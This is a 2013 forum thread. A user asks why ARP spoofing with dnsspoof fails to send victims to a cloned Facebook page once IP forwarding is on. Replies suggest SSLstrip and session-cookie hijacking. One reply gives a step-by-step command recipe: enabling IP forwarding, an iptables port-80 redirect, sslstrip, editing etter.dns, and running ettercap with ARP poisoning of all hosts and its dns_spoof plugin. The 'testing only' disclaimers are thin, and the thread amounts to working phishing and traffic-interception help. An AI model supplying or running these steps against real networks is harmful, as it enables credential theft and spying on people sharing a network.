TheCppGuy Posted April 3, 2013 Share Posted April 3, 2013 Hello Guys, This is my first post here, so please correct me if i'm doing something wrong. :) OK, so I'm experiencing a very strange problem... I want to be able to redirect traffic to a local IP address, so I recently installed dsniff on my PC. Well, I firstly arpspoof the victims successfully and then fire up dnsspoof, using an ordinary dnsspoof.conf file which contains something like this: facebook.com <ip adress here> *facebook.com <ip adress here> When IP forwarding is set to 0, the redirection works perfectly. However, when the victim tries to visit or ping another site, it is clear that the packets are intercepted, he just can't access the site. So, I read somewhere that in order for this not to happen, you need to enable IP forwarding. And so I did. Now, the victim can acess every website,but the thing is that although dnsspoof says that somebody connected to facebook.com, it doesnt redirect him to the cloned facebook site. Is there a way to fix this problem? (I don't want to use another tool like ettercap and this is for testing purposes only). Thanks in advance, TheCppGuy Quote Link to comment Share on other sites More sharing options...
sierrabrav0 Posted April 5, 2013 Share Posted April 5, 2013 (edited) Instead of trying to redirect your ex-girlfriend on to a phishing page you could try to do a MITM attack using session cookies hijacking with SSL STRIP or HAMSTER&FERRET Please Don't do anything evil / try it in your lab for POC purpose and not against innocent people. Edited April 5, 2013 by sierrabrav0 Quote Link to comment Share on other sites More sharing options...
sierrabrav0 Posted April 5, 2013 Share Posted April 5, 2013 Act like an Adult Quote Link to comment Share on other sites More sharing options...
atomixgray Posted April 9, 2013 Share Posted April 9, 2013 I've had the most success with ettercap. What are you using for ipfoward should be set to 1 What's your IPtables look like? Quote Link to comment Share on other sites More sharing options...
Lordx18 Posted April 12, 2013 Share Posted April 12, 2013 I'll tell you exactly what I do to get this to work. first run echo 1 > /proc/sys/net/ipv4/ip_forward then set up ip tables by using iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 start apache2 server make sure you change the ether config file in /etc. scroll down till you see linux and remove both the "#" from the redid_command_on and reddir_command_off. edit your etterdns file. /usr/share/ettercap/etter.dns to the spoofed pages you want. Make sure the ip across from the spoofed pages you put are that of your network IP of your computer then run sslstrip -k -l 8080 then run ettercap I use the ettercap -G- to use the GUI type ettercap -G, shift+U to get your interface, click it, ctrl+s to scan for hosts, add the host to target 1, then go to manage plugins and double click the dns spoof. Then run the sniffer. ctrl+w. The specefied page you chose in your etterdns file will now be spoofed if you use the terminal text thing for ettercap just use ettercap -T -q -i (interface) -M arp // // (Thats for all hosts) -P dns_spoof (to run the plugin) so the steps I use as soon as I turn on my laptop (if I have etterdns and etter.conf done already) are echo 1 > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 start apache2 server sslstrip -k -l 8080 run the steps in the ettercap gui or the terminal. Hope this helped :3 Quote Link to comment Share on other sites More sharing options...
Lordx18 Posted April 12, 2013 Share Posted April 12, 2013 and I typed all this up and afterwards read you dont want to use ettercap -_- sorry! Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.